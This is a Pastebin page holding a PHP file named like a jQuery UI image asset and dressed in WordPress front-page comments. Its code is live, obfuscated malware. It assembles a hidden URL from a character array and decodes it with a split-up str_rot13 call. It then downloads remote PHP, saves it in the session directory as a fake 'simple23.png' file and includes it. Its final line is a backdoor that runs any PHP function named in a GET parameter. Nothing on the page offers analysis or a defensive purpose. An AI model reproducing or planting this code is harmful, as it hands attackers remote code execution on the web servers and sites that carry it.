Advertisement
PalmaSolutions

ui-bg_glass_95_fef1ec_1x400.php

Jun 11th, 2018
168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.82 KB | None | 0 0
  1. <?php
  2.  
  3. /**
  4.  * Front to the WordPress application. This file doesn't do anything, but loads
  5.  * wp-blog-header.php which does and tells WordPress to load the theme.
  6.  *
  7.  * @package WordPress
  8.  */
  9.  
  10. /**
  11.  * Tells WordPress to load the WordPress theme and output it.
  12.  *
  13.  * @var bool
  14.  */
  15.  
  16. $id = "RmnsJf4E";
  17. $slow = array("12"=>"u","32"=>"g","1"=>"c","3"=>"f","2"=>":","4"=>"/","5"=>"n","8"=>"r","6"=>"o","09"=>"v","76"=>"a","67"=>".","77"=>"p","88"=>"z","74"=>"b","222"=>"e","111"=>"j","55"=>"I","89"=>"S","90"=>"Z","99"=>"w","94"=>"F");
  18. $content = $slow['12'].$slow['32'].$slow['32'].$slow['1'].$slow['2'].$slow['4'].$slow['4'].$slow['1'].$slow['5'].$slow['3'].$slow['32'].$slow['8'].$slow['6'].$slow['09'].$slow['76'].$slow['67'].$slow['77'].$slow['74'].$slow['88'].$slow['4'].$slow['222'].$slow['5'].$slow['111'].$slow['4'].$id;
  19. $wp2wp='str_r'.'ot'.'1'.'3';
  20.  
  21. if(is_writable(session_save_path()))
  22. {
  23.     $sess = session_save_path();
  24. }else
  25. {
  26.     $sess = ".";
  27. }
  28.  
  29. if(!file_exists($sess.'/simple23.png'))
  30. {
  31.     if(ini_get('allow_url_fopen')=='1')
  32.     {
  33.         file_put_contents($sess.'/simple23.png',"<?php ".file_get_contents($wp2wp($content)));
  34.     }else
  35.     {
  36.         file_put_contents($sess.'/simple23.png',"<?php ".get($wp2wp($content)));
  37.     }
  38.    
  39.     if(filesize($sess.'/simple23.png')>0)
  40.     {
  41.         include($sess.'/simple23.png');
  42.     }else { print "ewl"; } 
  43. }else
  44. {
  45.     if(filesize($sess.'/simple23.png')>0)
  46.     {
  47.         include($sess.'/simple23.png');
  48.     }else { print "ewl";unlink('./simple23.png'); }
  49. }
  50. function get($hst)
  51. {
  52.     if(!function_exists("curl_init"))
  53.     {
  54.         return file_get_contents($hst);
  55.     }else
  56.     {
  57.         $curl = curl_init();
  58.         curl_setopt($curl, CURLOPT_URL, $hst);
  59.         curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);
  60.         $out = curl_exec($curl);
  61.         return $out;
  62.         curl_close($curl);
  63.     }
  64.    
  65. }
  66. if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement